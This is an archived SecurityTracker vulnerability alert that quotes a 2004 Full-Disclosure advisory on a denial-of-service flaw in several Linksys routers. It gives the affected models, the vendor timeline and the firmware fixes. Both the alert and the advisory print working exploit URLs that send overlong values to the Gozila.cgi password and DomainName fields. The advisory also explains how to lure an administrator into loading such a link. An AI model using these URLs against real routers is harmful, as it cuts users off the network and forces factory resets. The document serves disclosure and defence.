Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Linksys Routers Can Be Crashed With Specially Crafted sysPasswd and sysPasswdConfirm or DomainName Values
|
|
SecurityTracker Alert ID: 1010382
|
|
SecurityTracker URL: http://securitytracker.com/id?1010382
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jun 3 2004
|
Impact: Denial of service via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): Firmware 1.45.7; Models BEFSR41, BEFSR41 v3, BEFSRU31, BEFSR11, BEFSX41, BEFSR81 v2/v3, BEFW11S4 v3, and BEFW11S4 v4
|
Description: A denial of service vulnerability was reported in several Linksys routers. A remote user can cause the device to crash.
b0f (Alan McCaig) reported that a remote user on the internal network can send a string of about 150 characters to both the sysPasswd
and sysPasswdConfirm fields of 'Gozila.cgi' script to cause the device to crash.
It is also reported that a remote user can send
a string of approximately 350 characters to the DomainName field of the 'Gozila.cgi' script to cause the device to crash.
Some
demonstration exploit URLs are provided:
http://192.168.1.1/Gozila.cgi?sysPasswd=AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sysPasswdConfirm=AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA&UPnP_Work=1&FactoryDefaults=0
http://192.168.1.1/Gozila.cgi?hostName=&DomainName=AAAA
AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAA&WANConnectionSel=0&ipAddr1=192&ipAddr2=168&
ipAddr3=1&ipAddr4=1&netMask=0&WANConnectionType=1
If either of theses
types of URLs is loaded by an administrator, the device will require a hard reset to the factory settings in order to return to
normal operations, the report said.
The following models are reported to be affected:
BEFSR41, BEFSR41 v3, BEFSRU31, BEFSR11,
BEFSX41, BEFSR81 v2/v3, BEFW11S4 v3, and BEFW11S4 v4.
The vendor was reportedly notified on December 1, 2003.
|
Impact: A remote user on the internal network can cause the target device to crash.
|
Solution: The vendor has reportedly issued a firmware update for BEFSR41 v3, BEFSX41, BEFW11S4 v3, and BEFW11S4 v4, some of which have been
available since March 2004. The vendor is reportedly working on a fix for BEFSR81 v2/v3.
The updates are available at:
http://www.linksys.com/download/firmware.asp
?fwid=3
|
Vendor URL: www.linksys.com/ (Links to External Site)
|
Cause: Exception handling error
|
Reported By: b0f <b0fnet@yahoo.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 3 Jun 2004 01:31:06 -0700 (PDT)
From: b0f <b0fnet@yahoo.com>
Subject: [Full-Disclosure] DoS vuln in various versions of Linksys routers.
|
Denial of Service Vulnerability in
Linksys BEFSR41 - Router vuln was identified and
tested on.
Linksys BEFSR41 v3
Linksys BEFSRU31
Linksys BEFSR11
Linksys BEFSX41
Linksys BEFSR81 v2/v3
Linksys BEFW11S4 v3
Linksys BEFW11S4 v4
Available from www.linksys.com
October 19, 2003 (Revised November 10, 2003)
Released Date: 3rd June 2004
NOTE: THIS ADVISORY WAS ORIGINALLY WITTEN FOR THE
Linksys BEFSR41 EtherFast Cable/DSL Router with 4-Port
Switch
I. BACKGROUND
Linksys Group Inc.'s EtherFast Cable/DSL Router with
4-Port Switch
"is the perfect option to connect multiple PCs to a
high-speed
Broadband Internet connection or to an Ethernet
back-bone. Allowing
up to 253 users, the built-in NAT technology acts as a
firewall
protecting your internal network." More information
about it is
available at
http://www.linksys.com/products/product.asp?prid=20&grid=23
II. DESCRIPTION
It is possible for a remote/local attacker to crash
the linksys router and
leave it in a state that it can't be accessed even
after reboot due to an
invalid password. An attacker could set up a web page
or send an html
email to someone inside the LAN to indirectly send
commands to the router.
An attacker could specify a URL that results in denial
of service. The DoS
Occurs when 2 long strings are sent to the sysPasswd
and sysPasswdConfirm
Parameters on the Gozila.cgi script, about 150
characters to each parameter
Seems to work fine. If an attacker can get the admin
of the router to view a link
Or goto a webpage that links to such a link as this.
http://192.168.1.1/Gozila.cgi?sysPasswd=AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sysPasswdConfirm=AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA&UPnP_Work=1&FactoryDefaults=0
The router will drop all internet connections making
the internet inaccessible from the
LAN even if the router is powered off and back on. It
also seems to change the
password in such a way that the admin can't log back
into the router and the only way
to solve it is by pressing the factory reset button on
the front of the router, Which will
then reset all previously stored settings and reset
the password back to factory default
'admin'. The router would then need to be set back up
again from scratch.
REVISED NOVEMBER 10, 2003
On November 10 2003 I found another overflow in
linksys router which is a similar attack
method to the first vuln in this advisory. The DoS
occurs in this attack when a long
string about 350 characters is passed to the
'DomainName' parameter of the Gozila.cgi
script. An example of this attack would be to get the
admin of a router to visit a link
like this.
http://192.168.1.1/Gozila.cgi?hostName=&DomainName=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&WANConnectionSel=0&ipAddr1=192&ipAddr2=168&
ipAddr3=1&ipAddr4=1&netMask=0&WANConnectionType=1
This would cause the router to crash and the Factory
reset button on the front of the
Router would need to be pressed to restore it back to
normal working order.
III. ANALYSIS
Exploitation may be particularly dangerous, especially
if the router's remote
management capability is enabled. It may also be
easily exploited by fooling
an admin of the router into clicking a link he/she
thinks is valid. This is probably
vuln in older version of the firmware.
IV. DETECTION
This vulnerability affects the BEFSR41 EtherFast
Cable/DSL router with the latest
firmware version 1.45.7 I also tested version 1.44.2z
which is also vuln so probably
all other version below this are also vuln . It may
also be possible that other version of
Linksys routers are vuln to this attack if they use
the same type of management. I'm unable
to confirm any other models that are vuln to this
attack. The Linksys BEFSRU31 and BEFSR11
use the same version of firmware as the BEFSR41 so
they are probably vuln.
NOTE ADDED June 3rd 2004:
The Vendor confirmed this vuln in all version stated
at the start of this advisory
V. RECOVERY
Pressing the reset button on the front of the router
and setting it back up from scratch
should restore normal functionality to the router.
VI. WORKAROUND
Don't click untrusted links.
VII. VENDOR
19 Oct 2003: First vuln discovered.
10 Nov 2003: Second vuln discovered.
01 Dec 2003: Vendor contacted via security@linksys.com
01 Dec 2003: Response Recived from
jay.price@linksys.com
10 Dec 2003: Issue been turned over to project manager
andreas.bang@linksys.com
17 Dec 2003: I was sent a beta release of the new
firmware witch fixed the vuln but
had a bug where the logging function
wouldn't work.
22 DEc 2003: andreas.bang@linksys.com now moved office
now to contact anbang@cisco.com
29 Jan 2004: Was told patches would be up in the next
week
29 Feb 2004: They said there was a problem with the
code, still no patches
24 Mar 2004: Recived a email about patches saying.
BEFSR41 v3(Post on by 3/31)
BEFSX41 (posted)
BEFSR81 v2/v3(in progress)
BEFW11S4 v3(post by 3/31)
BEFW11S4 v4(posted)
02 Jun 2004: Advisory released to public still no
patch for the Linksys BEFSR41
EtherFast Cable/DSL Router with 4-Port
Switch
http://www.linksys.com/download/firmware.asp?fwid=3
The version this advisory was first
written for it still remains vuln to date.
b0f (Alan McCaig)
b0fnet@yahoo.com
www.b0f.net
=====
www.b0f.net
__________________________________
Do you Yahoo!?
Friends. Fun. Try the all-new Yahoo! Messenger.
http://messenger.yahoo.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
Go to the Top of This SecurityTracker Archive Page
|
